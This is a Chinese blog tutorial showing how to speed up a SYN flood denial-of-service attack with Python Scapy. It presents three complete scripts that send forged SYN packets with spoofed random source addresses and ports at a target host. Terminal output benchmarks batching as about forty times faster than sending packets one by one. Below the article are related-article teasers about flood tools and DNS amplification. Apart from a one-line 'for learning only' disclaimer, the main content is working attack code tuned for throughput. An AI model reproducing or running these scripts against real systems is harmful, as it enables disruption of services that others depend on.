Scapy:快速syn洪水攻击(syn flood)

已于 2023-01-05 11:03:59 修改
阅读量996 收藏 13
点赞数 1
分类专栏: Python Scapy 文章标签: python 网络 linux Powered by 金山文档
于 2023-01-05 02:03:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71713477/article/details/128556822
版权

()写作不易,记得点个赞哦)

在一个send函数中同时发送多个syn包是提高syn洪水攻击效率的关键,下面将给出一个简单的例子。

常规的写法(使用for循环反复调用send函数发包):

#demo.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint

#用于计时,不是攻击中的必须组件
from time import time

def randip():
    '''
    返回随机的IPv4地址,用于伪造源地址
    '''
    return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225
        [str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )]  
    )

def attack(dst, dport, amount):
    '''
    进行syn洪水攻击的函数
    '''
    #构造syn包不是本文重点,先构造一个最简单的,且不做改变
    pkt = IP(src=randip(), dst=dst) / TCP(dport=dport) 

    #发包部分
    #for循环发包
    for i in range(amount):
        send(pkt)

if __name__=="__main__":
    amount = 1000
    start_time = time()
    attack("192.168.1.1", 80, amount)
    use_time = time() - start_time
    print(use_time, use_time/amount)

结果为:

┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo.py
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
(中间略)
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
34.551655292510986 0.03455165529251099

平均用时为:0.03455165529251099秒

改进后的写法(将包复制后用单个send函数发包):

#demo2.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint

#用于计时,不是攻击中的必须组件
from time import time

def randip():
    '''
    返回随机的IPv4地址,用于伪造源地址
    '''
    return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225
        [str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )]  
    )

def attack(dst, dport, amount):
    '''
    进行syn洪水攻击的函数
    '''
    #构造syn包不是本文重点,先构造一个最简单的,且不做改变
    pkt = IP(src=randip(), dst=dst) / TCP(dport=dport) 

    #发包部分
    #将syn包复制amount份后传递给send函数
    send(
        pkt*amount
    )

if __name__=="__main__":
    amount = 1000
    start_time = time()
    attack("192.168.1.1", 80, amount)
    use_time = time() - start_time
    print(use_time, use_time/amount)

结果为:

┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo2.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
0.8448374271392822 0.0008448374271392823

平均用时为:0.0008448374271392823秒

第一种写法平均发包时间来比第二种慢了0.033706817865371705秒,约是第二种的40.9倍;总用时慢了33.706817865371704,倍数同上。只能说没有对比就没有伤害😜

改进版(大量发送不同的syn包):

只需要将syn包放在列表或元组中传给send函数即可,效果与上面第二种写法一样。

#demo3.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint

#用于计时,不是攻击中的必须组件
from time import time

def randip():
    '''
    返回随机的IPv4地址,用于伪造源地址
    '''
    return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225
        [str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )]  
    )

def randport():
    '''
    返回随机端口,用于改变出站端口
    '''
    return randint(1, 65535) #端口范围为0到65535,0一般不用
                             #

def reset(pkt):
    '''
    接受一个完整的syn包,重设源地址和出站端口并返回
    '''
    ip_pkt = pkt["IP"] #scapy使用类字典的方式访问各层
    tcp_pkt = pkt["TCP"]
    
    ip_pkt.src = randip()
    tcp_pkt.sport = randport()
    
    return ip_pkt / tcp_pkt

def attack(dst, dport, amount):
    '''
    进行syn洪水攻击的函数
    '''
    #初步构造syn包
    pkt = IP(src=randip(), dst=dst) / TCP(sport=randport(), dport=dport) 

    #发包部分
    #构造含有不同syn包的列表并传给send函数
    send(
        [reset(pkt) for i in range(amount)] #使用列表推导式
    )
    '''
    不用列表推导式的版本(仅发包部分)
    pkt_list = []
    for i in range(amount):
        pkt_list.append(reset(pkt))
    send(pkt_list)
    用此写法,性能差别不大(实测),此处举出是为了方便理解
    '''

if __name__=="__main__":
    amount = 1000
    start_time = time()
    attack("192.168.1.1", 80, amount)
    use_time = time() - start_time
    print(use_time, use_time/amount)

运行结果:

┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo3.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
1.1187617778778076 0.0011187617778778075

wireshark截图:

因为要构造不同的syn包,所以用时略有增加,但性能依然比之前好得多。

(本文仅供学习,禁止进行违法行为)

Matriller
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Scapy的传统网络攻击实现
a1379292747的博客
09-14 3203
Scapy是一个由Python编写的强大工具,目前很多优秀的网络扫描攻击工具都使用了这个模块。也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。Scapy还是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送,捕获它们,匹配请求和回复等等。Scapy可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现。它可以取代hping,arpspoof,arp-sk,arping,甚至是Nmap,tcpdump和tshark的某些部分。
[笔记]使用Python的scapy库实现SYN洪水攻击
qq_61690448的博客
12-22 2333
[笔记]实现SYN泛洪攻击
TCP SYN-Flood攻击解决办法分析
FeelTouch Labs
09-29 3873
What's SYN Flood? SYN Flood是一种非常危险而常见的Dos攻击方式。到目前为止,能够有效防范SYN Flood攻击的手段并不多, SYN Cookie就是其中最著名的一种。 SYN Flood攻击是一种典型的拒绝服务(Denial of Service)攻击。所谓的拒绝服务攻击就是通过进行攻击,使受害主机或 网络不能提供良好的服务,从而间接达到攻击的目的。 ...
​​​​网络编程探索系列 —— 洪水网络攻击
最新发布
weixin_73951752的博客
04-13 2248
洪水攻击,也被称为拒绝服务攻击(DoS),是一种旨在通过使网络或系统资源耗尽来阻止用户访问服务的攻击手段。这种攻击通常通过发送大量请求来淹没目标系统,导致合法用户无法访问服务,其中主要利用了网络协议的安全机制或者直接使用十分简单的大量ping资源的方法来对目标机造成影响。
SYN洪水攻击的原理,syn洪水攻击的解决办法
携手驰网多多一同探索拥有一台服务器可以做哪些很酷的事情吧~
06-27 519
在上面的示例中,在发送总共8个数据包之前,所有新的传入连接都被阻止。建议的措施包括SYN cookie和限制在特定时间段内从同一源请求的新连接数,但最新的TCP / IP堆栈没有上面提到的瓶颈因为它位于SYN Flood和其他基于通道的容量之间。SYN Flood是一种众所周知的攻击,在现代网络中通常无效。这种类型的攻击仅在服务器收到SYN后才分配资源,但在本节中,它会在收到ACK之前生效。SYN攻击的目标不止于服务器,任何网络设备,都可能会受到这种攻击,针对网络设备的SYN攻击往往会导致整个网络瘫痪。
了解 SYN Flood 攻击
qq_61939403的博客
03-02 940
SYN洪水攻击详解
Python项目 基于Scapy实现SYN泛洪攻击的方法
09-19
**Python项目:基于Scapy实现SYN泛洪攻击** SYN泛洪攻击是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,它利用TCP三次握手过程中的漏洞,通过发送大量伪造的SYN请求来消耗目标服务器的资源,使其无法...
scapy:Scapy演示和代码
05-01
这是Scapy库的快速介绍。 使用scapy.pdf文件中的幻灯片和Python文件中的代码,用户应该对Scapy库有基本的了解。 幻灯片组包含指向其他资源的链接,这些资源可用于更多地了解Scapy。 所有的代码示例都是在Ubuntu ...
python2.7使用scapy发送syn实例
09-16
主要介绍了python2.7使用scapy发送syn实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
synFlood.py
08-25
中国秦川联盟SYN泛洪攻击Python脚本,使用第三方库Scapy,支持多线程攻击
SYN,ICMP, UDP Flood攻击原理与防护
mojirener的博客
01-05 2251
DoS(Denial of Service拒绝服务)和DDoS(Distributed Denial of Service分布式拒绝服务)攻击是大型网站和网络服务器的安全威胁之一。2000年2月,Yahoo、亚马逊、CNN被攻击等事例,曾被刻在重大安全事件的历史中。SYN Flood由于其攻击效果好,已经成为目前最流行的DoS和DDoS攻击手段。今天我们就来讲解一下SYN,ICMP, UDP Flood攻击原理与防护   SYN Flood利用TCP协议缺陷,发送了大量伪造的TCP连接请求,使得被攻击方资
SYN flood C源代码
01-25
SYN flood是属于DOS攻击的一种典型方式,其发生方式就出现在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒 -2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,并处于崩溃状态,这种情况我们称之为:服务器端受到了SYN Flood攻击SYN洪泛)。
syn.exe --(HUC SYN Flood Tool V0.2)
04-22
软件说明: 在命令提示符下运行,只支持NT/2000/XP/03系统 中国红客联盟(HUC) 在鼎盛时期的DDOS作品 上传只为学习之用,禁止用于非法途径!
测试syn-flood等泛洪攻击的小软件
10-26
可以模拟syn flood udp flood等泛洪攻击的一款小软件,360会报警。
udp flood攻击的socket实现
12-26
udp flood攻击。采用向同一网络地址频繁发送相同的udp数据包的方式攻击攻击的同时伪造自身源ip地址,源mac地址。 需要微软socket相关库
syn 攻击脚本 python_Python Scapy实现SYN Flood攻击
weixin_39731845的博客
11-29 264
SYN Flood的python实现代码如下。需要事先安装scapy库。(是scapy 不是scrapy)from scapy.all import *import randomfrom scapy.layers.inet import TCP, IPimport socket,threadingdst=""dport=0class flood_SYN(threading.Thread):glob...
scapy模拟攻击_用scapy模拟DNS放大攻击
weixin_39761822的博客
02-22 484
首先,DNS放大攻击,简单解释有两点: 1.伪造源IP为其他人的ip地址 2.被请求的记录,要求比较大,比如TXT格式,4000KB 在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。 可以用python的scapy模拟: from scapy import * a首先,DNS放大攻击,简单解释有两点:1.伪造源IP为其他人的ip地址2.被请求的记录,要求...
使用scapy实现TCP SYN-Flooding攻击
redwingz的博客
11-13 4219
  基于ubuntu 16.04系统,首先安装scapy,如下的apt-get或者可使用python的pip命令安装,scapy是一个功能强大网络数据包处理程序,包括对数据包的嗅探、解析和构造。本文即使用其数据包构造功能,实现syn flooding攻击。 # sudo apt-get install scapy TCP SYN Flooding即向服务器的监听端口不断发送TCP的SYN报...
Python黑帽编程 3.3 MAC洪水攻击
玄魂工作室
09-05 4218
传统的交换机(我只对我目前使用的交互机做过测试,按照常识只能这样表述)在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关目的MAC对应的条目,此数据帧将作为广播帧来处理。CAM表的容量有限,只能储存不多的条目,当CAM表记录的MAC地址达到上限后,新的条目将不会添加到CAM表中。 基于以上原理,我们会发现一个非常有趣的现象。某台PC不断发送去往未知目的地的数据帧,且每个包的源MAC地址都不同,当这样 的数据包发送的速度足够快之后,快到在刷新时间内将交换机的CAM表迅速填满
kali的SynFlood洪水攻击
09-13
在Kali Linux中,有一些工具可以用于执行SynFlood洪水攻击,其中最常用的是hping3和Scapy。这些工具允许用户生成大量伪造的TCP SYN包,并将它们发送到目标系统。 但是,请注意,执行任何形式的网络攻击都是非法的,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值